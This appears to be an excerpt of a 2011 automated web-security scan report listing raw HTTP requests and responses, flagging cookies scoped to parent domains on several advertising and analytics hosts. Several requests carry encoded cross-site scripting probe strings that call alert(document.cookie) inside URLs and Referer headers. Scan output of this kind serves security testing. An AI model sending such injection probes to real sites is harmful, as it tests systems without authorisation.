myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqFuWXbME%252Fp0Zu2laVBUEq7zOPXbu%252BLVgLO%252F7Auu3QlxW6GM2OWc0CN5ABDPJzSBvaLXeF1QsKsbhgDEYABSMYaboKDtSl2ROMF9lKRhKwXG2DoglRD5Ua3cz2c34YrfDzt7eD7brd5r0xwUSX1kgLFg6wVLDphmLgmE6xQjA%252BBSNfuWLEoQmeZ4lSbEmmQtkJ%252F9A5onAy74%252FAJXLwsWqy7UbbzMxBLQEBEEfHMZ2kRpcq6Hv5N%252F7x3Gy%252FWa8s9qKtFEHooOL8U8%252BVc3lHopF%252FJ%252BuexhVJTvcVp2eBI%252FfdNcMNVUPhltSeJ5qezkfec3psXDpp5wONyDV4WJYIvybyOcXUsKxDg%253D%253D; TFF=eJydlT1uwzAMhe%252BSE%252FBHMiVl8TG6ZshQoFu7Bbl7ZceRElFy6Q6GDeF94iNDMpfkXLp9J6R0QnAzTDDHGOl0viRKt8%252BE5%252Fy46PML1s8pnu9Kj4ueGz3lp%252BWkYDYiv8ENlKLvvn5cvy4%252F1%252FZu2QiGXhoCMwD20pZqJn9qfZu2PK1hw0nBbER%252BCxjvXjyR86McQs0hPPSu6il4lth4CjqSJjFGFvoPyUAi3kpKAW1EPnPe6urZxKHb9CFUfejolaOg44TXpg9t0w%252BJ9TcFmF2Y9iORDrVxRiQfAgzGBadBARCOFWzTHy1Yxo4UDIVzn1DXWaz62NErZ1HHKfvrgdmIZZDZePc6JLwzXmXzuULGugK4rABn5l4iRhLwwz3OLcmVJCBo53kMvodkbBvVapZxGLMlpYA2Ip%252BxP%252BCq%252FBHu5oN%252FkcN8FMmV3C2%252BAre14rHb9WXwu6V%252Fct0kzaTyOiS5kt0kR6AUzkbcfwHLoUO%252F
Response
HTTP/1.1 200 OK Connection: close X-Powered-By: PHP/5.2.8 P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA Content-Type: application/json Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSzNDQ1MTK1rASUAFEE%253D; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: myPAL=eJylkstOw0AMRf%252Bls52F7Xl4Jl0FIqRKJIISULcsu2YJ%252FDv2TB4tqgqCVV7nnnhsvzbIzfuxge1bQ9xs0Mdscs5oELyBCGaUm17e0GZ7bFCxqBiHCWMwACgYw0zRIluoSzInmC%252ByFAyl4DhbB8QSIh%252BKtb0Z7W54sfv%252BYG%252Fve9t2B0365QeJr%252FwgrFg6wVLFxhmLgmE6xQjA%252BBSNfuWLEoQqeZ4lSbEqmRvITs5A5onAS90fgMpl4WLR5dIbbzMxBLQEBEEfHMZ6kTa42oaulbN3j8Nou91wZ7Ur0o0yEB1cjH%252FyqWpu7tRYxP%252Fp2odBVVLhvuh0Ezx%252B010zlFRZDLem8DxVazkfecnpWrj0U06HG5DKcDGsEf5lJK7VXYmUJZmqk1N9fgFco7yt; expires=Wed, 06-Apr-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: BFF=eJztlM1OwzAQhN8lT%252BCfOI7dS1OqikhNgNat4IR65MwR%252Bu6s3SRdu2uJoB65fjMeO%252FF6TrYU9uvTcmYLx1nZLY0xolh8WF7WegGCtEX31LvH7dv7sd23rlicrKpzayoDa9TAEYq8EgnGc81QhFaAywtGxCc0K7cUtZLaDCf0ggwcgdEpmdBaJULbH8kI4ISTjNh1r2QEcMLJ4Xu1IAQy%252B2HbkdnACScZ0ayJbBk4dorxQqLtdCRFMRpdo8NjUl%252Bv3CE0xiRXFkvRDjXa4ZDZ4ZDzSiyAeS9YCZ%252F8zbhXq0EdZ%252FGqYkFMQrpGTwqCMLvrZhtGurxgM8yux4h440vvKCPgxNj2G8oIGJFxxo3QTPE4IbwSJpiKcRitBI9zTsWEl0L4%252FexS%252FvAs8n7Jq5yQHNT%252Ffiqoee5vN5aBJwFgJAPW9Mmb1e7GH1plhwP49GDS6EHZRIq%252BzuxmQme6CbXKN2G29%252BbX3PxWo0osur%252Ffl9j8zrpzRd25j%252F5aPvmOydRJpjwyVfFfDPftgfnP%252FvwDMTU0HA%253D%253D; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: TFF=eJydlktywyAMhu%252BSE0gILCAbH6PbLLLoTHftLpO7lyQ2uBI4chceGOb%252F0MOS7EsOkG%252FfGV0%252BIfgZJphTSu50vmSXb58Zz%252BXxKZQFntspne9Kjw89Cb0rj%252BS4YjairOCFkhdl1HdfP65fl5%252BrvHslCHthMMwA2AubmzNlq%252FUybF6DQMFxxWxEWRmMdz98cj6MYogthvjS%252B6Z3MRAn4VPUljSJKRG7%252F5AEjjlYSa6gjShnPli9Wos4dos%252BtgIrW61XHkVtJ26LPsqiHxLPdwow%252BzjtW3La1MIZkXIIMGgXnAYJQDiWsEV%252FNGEFO5IwZCp14rqepaZPHb3yLGk7dX69MBvxaGQy3v1sEtpprzojfSVTGwFUR4A3cxuLyTGE4RwnSVIjHTiQ%252FTwG%252F5oklIVqdZZwaFOSXEEbUc4oHPCqfgh348F35DAeRVIjd5OvwGWsBOxWfW38bupXrhukmVS%252BDklqZDfIEciVM5tax9Tg54ebnjv6YRpRcn7D7abxLTnMhiKpkbtplCBXzkbcfwGeWpTs; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Date: Sat, 05 Feb 2011 22:25:32 GMT Server: HTTP server Content-Length: 18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.slackbooks.com%2Fessentialknee HTTP/1.1 Host: map.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1ubmf00z10020607206; orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; rdrlst=4140o2ylebnns0000000z100207dpletz4d0000000v100210e5lg1nei0000000510020mmnlebnns0000000z100210rdlg1vir0000000410020x1blebnns0000000z10020xo1lebnns0000000z10020eh5lf17qf0000000r100206bylemlne0000000x10020w3clebnns0000000z100207gmlebnns0000000z10020jv6lebnns0000000z10020j4ilew2e20000000t10020xthlebnns0000000z10020fullf8gij0000000n100210f6lg1nei0000000510021196lfzx0l00000006100200c9lfk1rn0000000k10020jillebnns0000000z10021194lg3y5y0000000310020fuqlegh2b0000000y10020b6mlf17qk0000000q10020mz1lebnns0000000z10020cajlfk1rn0000000k10020p7vlebnns0000000z100207vglfk1rn0000000k10020xvslebnns0000000z10021192lg5l2h00000002100210ellg1nei0000000510020xuklebnns0000000z10020jk7lebnns0000000z10020x1jlebnns0000000z10020yiplebnns0000000z10020cbnlfk1rn0000000k10020xwflebnns0000000z10020yh0lebnns0000000z10020e4vlebnns0000000z100210e9lg1nei0000000510020xwblebnns0000000z10020jwblfk1rn0000000k1002; sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000p1002060720682gletz4d0pqa500a0l000400100ag2leqh191fi8y00w1002060720682hlebnns1o9ct00z100206072069zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300l10020607206820lebnns181qq00e0l000400100b0olfjpei0g7m300l10020607206ab4lebnns1o9ct00z100206072069szlebnns1o9ct00z100206072068wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pi7w00y10020607206al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0g7m300l100206072068bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns1o9ct00k10020606206b08lfjpei0g7m300l1002060720640slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000m1002060720640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: messenger.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:22 GMT Set-Cookie: B=cavfg3t6krlge&b=3&s=da; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20576
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Yahoo! Messenger - Chat, Instant message, SMS, Video Call, PC Calls</title> <meta http ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A75175051D128B-40000130C01FD049[CE]; Expires=Fri, 5 Feb 2016 13:32:26 GMT; Domain=.blackberry.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461?AQB=1&ndh=1&t=6%2F1%2F2011%207%3A33%3A2%200%20360&ns=researchinmotion&pageName=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&g=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&r=http%3A%2F%2Fburp%2Fshow%2F47&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Adevices&events=event8&c1=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&h1=us%2Cbb%2Cdevices%2C94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Cscript%253Ed0d62204af5&v9=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&v10=us%3Abb%3Adevices&v23=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&c40=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1001&bh=1031&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.blackberry.com Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BLLY=CT; fsr.a=1296999181981; s_cc=true; dfa_cookie=rimglobal%2Crimbbus
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 13:32:26 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A75175051D128B-40000130C01FD049[CE]; Expires=Fri, 5 Feb 2016 13:32:26 GMT; Domain=.blackberry.com; Path=/ Location: http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461?AQB=1&pccr=true&vidn=26A75175051D128B-40000130C01FD049&&ndh=1&t=6%2F1%2F2011%207%3A33%3A2%200%20360&ns=researchinmotion&pageName=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&g=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&r=http%3A%2F%2Fburp%2Fshow%2F47&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Adevices&events=event8&c1=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&h1=us%2Cbb%2Cdevices%2C94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Cscript%253Ed0d62204af5&v9=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&v10=us%3Abb%3Adevices&v23=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&c40=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1001&bh=1031&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Sat, 05 Feb 2011 13:32:26 GMT Last-Modified: Mon, 07 Feb 2011 13:32:26 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www334 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=12476 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(1)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt+/NP3wA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:10:09 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:10:09 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 17:10:08 GMT Connection: close Content-Length: 10810
document.itxtDisabled=1; function itxtokeydoke(){try{var b=document.getElementByTagName('BODY')[0];if(document.all){if(b.innerText.indexOf('Cx26A')>=0)return 1;}else{if(b.textContent.indexOf('Cx26A')> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:09 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNoopUmJl2rsItRDWa+mMYtlFsMkqNkYLjf2S50TROQG59rAL1bd9/fru8qt59wzOMjm3zNoYwE3YNuGFh9r5pQyYF8IBuWtKzzuHg0EDf/OXTGwN4F0yzBRSsFrNaxBTurQk405PQiw6OztUAy+wVNGctUh2bI4o+E9Ip02zo1FpoGCl03GPW8YYrbsxuJG3RP/FXHhECqNMLZ3FujUPMYSQS4kC+I6tXLqBlwHa+Y8F+vNGqcNkAxZpUSMvHEO8khCYplFBx+Y+YbrxuGvKbBA4tZ0bqBN4lQhUBzx8YBlP2FsPJrbVK6NMroVMNC22xzJ0lAih4JSqLegFemViNUjn5mzE3l3Blj4eWfvwLcr4gqAZw5ywM/1YurC6/+iOUtyrecQGPVej55Oz02Rg41Zv724GqbA.1tBPbIb2KArc06KV27bEdA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:26:09 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19728
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=foxnews8.com,usinsuranceonline.com,d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track?target=http%3A%2F%2F0.r.msn.com%2F%3Fld%3D4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:22 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJSQEuhBljgvx6LisqP2AupJFgK5WemUmSqCRZBWwtlJoLJyYgB+x08rWfR/ShFOalNGTqfmziVraghl7E5uw5btO/3yboIdQqftyHKB+g7P8wMvkemEuzoCTYpWKHlUSxVhR50f2PlZ6fjsBY0CFwN9hVXFmL8HKdre0pLs5j588G6gZiAJRmHCBNkJOTSR//T65ILEf+/zYQH9GEFG21a2cOwXpQT/X3AA1xYRx55e5f0pk89+3749Q7bToVTjXJEtWHe0sLv6YvvEL0st9nPt2AvKtpaEWfj3Za7cWIDXcN0fSKTgVHgotXqUMppLvmdMFBj7UXYE3V4wIHjW4oLDYBkaexvtU/jFfW33U5VDxBYKf0wTugzjk+6FQPhbOk5WHOShaZ3pmXtPi1RHnV3CEpc3tWhURdlFptP5JLt2lQ0nGlSXSbFGH/vYeuIiFhzqouFUKdaeTaNkWRPNqjPrrmyjI3Zlgea+6POPlNmGrHviQhkvEwsbqhAr121e/z1ZyuXphNg==.dshw/dsAXHyAOlroJxVp1A.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:22 GMT Location: 